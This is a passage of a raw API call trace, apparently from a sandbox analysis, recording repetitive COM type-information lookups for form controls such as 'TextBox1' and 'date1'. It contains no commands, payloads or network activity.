[0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x39, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3a, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3b, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3c, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3d, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3e, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x3f, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x40, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x41, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x42, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x43, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x44, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x45, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x46, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x47, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.966] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x48, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.966] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x49, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4a, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4b, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4c, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4d, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4e, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x4f, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x50, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x51, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x52, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x53, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x54, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x55, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x56, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x57, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x58, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x59, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5a, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5b, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5c, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5d, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5e, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x5f, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.967] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.967] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x60, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.968] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.968] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x61, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.968] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.968] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x62, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.968] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.968] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x63, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.968] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.968] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x64, ppFuncDesc=0x184528, pDummy=0xc0 | out: ppFuncDesc=0x184528, pDummy=0xc0) returned 0x0 [0041.968] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.968] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2002, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x184570 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x184570*="") returned 0x0 [0041.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Text1", cchWideChar=6, lpMultiByteStr=0x184420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Text1", lpUsedDefaultChar=0x0) returned 6 [0041.968] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Text1") returned 0x107eb3 [0041.968] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6ceee08) returned 0x0 [0041.968] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1844a0, pDummy=0x24a | out: ppTypeAttr=0x1844a0, pDummy=0x24a) returned 0x0 [0041.968] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.968] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.968] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2200) returned 0x0 [0041.968] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceee60) returned 0x0 [0041.968] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.968] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.968] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2a00) returned 0x0 [0041.968] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceefc0) returned 0x0 [0041.968] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.968] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.968] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.968] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.968] IUnknown:Release (This=0x6ceee08) returned 0x1 [0041.968] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x65, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.968] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.968] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2003, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TextBox1", cchWideChar=9, lpMultiByteStr=0x184420, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TextBox1", lpUsedDefaultChar=0x0) returned 9 [0041.968] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TextBox1") returned 0x1053a6 [0041.968] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6ceee08) returned 0x0 [0041.969] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1844a0, pDummy=0x28a | out: ppTypeAttr=0x1844a0, pDummy=0x28a) returned 0x0 [0041.969] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.969] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.969] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2200) returned 0x0 [0041.969] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceee60) returned 0x0 [0041.969] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.969] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.969] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2a00) returned 0x0 [0041.969] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceefc0) returned 0x0 [0041.969] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.969] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.969] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.969] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.969] IUnknown:Release (This=0x6ceee08) returned 0x1 [0041.969] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x66, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.969] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.969] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2004, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.969] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="EditText1", cchWideChar=10, lpMultiByteStr=0x184420, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EditText1", lpUsedDefaultChar=0x0) returned 10 [0041.969] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="EditText1") returned 0x1097ee [0041.969] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6ceee08) returned 0x0 [0041.969] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1844a0, pDummy=0x290 | out: ppTypeAttr=0x1844a0, pDummy=0x290) returned 0x0 [0041.969] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.969] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.969] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2200) returned 0x0 [0041.969] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceee60) returned 0x0 [0041.969] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.969] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.969] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2a00) returned 0x0 [0041.969] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceefc0) returned 0x0 [0041.969] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.969] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.969] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.969] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.969] IUnknown:Release (This=0x6ceee08) returned 0x1 [0041.970] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x67, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.970] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.970] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2005, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ValidText", cchWideChar=10, lpMultiByteStr=0x184420, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ValidText", lpUsedDefaultChar=0x0) returned 10 [0041.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="ValidText") returned 0x10229c [0041.970] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6ceee08) returned 0x0 [0041.970] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1844a0, pDummy=0x23c | out: ppTypeAttr=0x1844a0, pDummy=0x23c) returned 0x0 [0041.970] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.970] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.970] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2200) returned 0x0 [0041.970] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceee60) returned 0x0 [0041.970] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.970] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.970] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2a00) returned 0x0 [0041.970] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceefc0) returned 0x0 [0041.970] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.970] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.970] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.970] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.970] IUnknown:Release (This=0x6ceee08) returned 0x1 [0041.970] ITypeInfo:RemoteGetFuncDesc (in: This=0x6a6e948, index=0x68, ppFuncDesc=0x184528, pDummy=0x180 | out: ppFuncDesc=0x184528, pDummy=0x180) returned 0x0 [0041.970] ITypeInfo:LocalReleaseFuncDesc (This=0x6a6e948) returned 0x0 [0041.970] ITypeInfo:RemoteGetDocumentation (in: This=0x6a6e948, memid=2008, refPtrFlags=0x184568, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0041.970] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="date1", cchWideChar=6, lpMultiByteStr=0x184420, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="date1", lpUsedDefaultChar=0x0) returned 6 [0041.970] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="date1") returned 0x1031d4 [0041.970] ITypeInfo:GetRefTypeInfo (in: This=0x6a6e948, hreftype=0x5000025, ppTInfo=0x184540 | out: ppTInfo=0x184540*=0x6ceee08) returned 0x0 [0041.970] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceee08, ppTypeAttr=0x1844a0, pDummy=0x28e | out: ppTypeAttr=0x1844a0, pDummy=0x28e) returned 0x0 [0041.970] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceee08) returned 0x0 [0041.970] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x0, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=1) returned 0x0 [0041.970] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x0, pRefType=0x184490 | out: pRefType=0x184490*=0x2200) returned 0x0 [0041.970] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2200, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceee60) returned 0x0 [0041.971] IUnknown:Release (This=0x6ceee60) returned 0x0 [0041.971] ITypeInfo:GetImplTypeFlags (in: This=0x6ceee08, index=0x1, pImplTypeFlags=0x184488 | out: pImplTypeFlags=0x184488*=3) returned 0x0 [0041.971] ITypeInfo:GetRefTypeOfImplType (in: This=0x6ceee08, index=0x1, pRefType=0x184490 | out: pRefType=0x184490*=0x2a00) returned 0x0 [0041.971] ITypeInfo:GetRefTypeInfo (in: This=0x6ceee08, hreftype=0x2a00, ppTInfo=0x184498 | out: ppTInfo=0x184498*=0x6ceefc0) returned 0x0 [0041.971] IUnknown:QueryInterface (in: This=0x6ceefc0, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x1843c0 | out: ppvObject=0x1843c0*=0x0) returned 0x80004002 [0041.971] ITypeInfo:RemoteGetTypeAttr (in: This=0x6ceefc0, ppTypeAttr=0x1843e8, pDummy=0x10 | out: ppTypeAttr=0x1843e8, pDummy=0x10) returned 0x0 [0041.971] ITypeInfo:LocalReleaseTypeAttr (This=0x6ceefc0) returned 0x0 [0041.971] IUnknown:Release (This=0x6ceefc0) returned 0x6 [0041.971] IUnknown:Release (This=0x6ceee08) returned 0x1 [0041.971] ITypeInfo:RemoteGetFuncDesc (in: 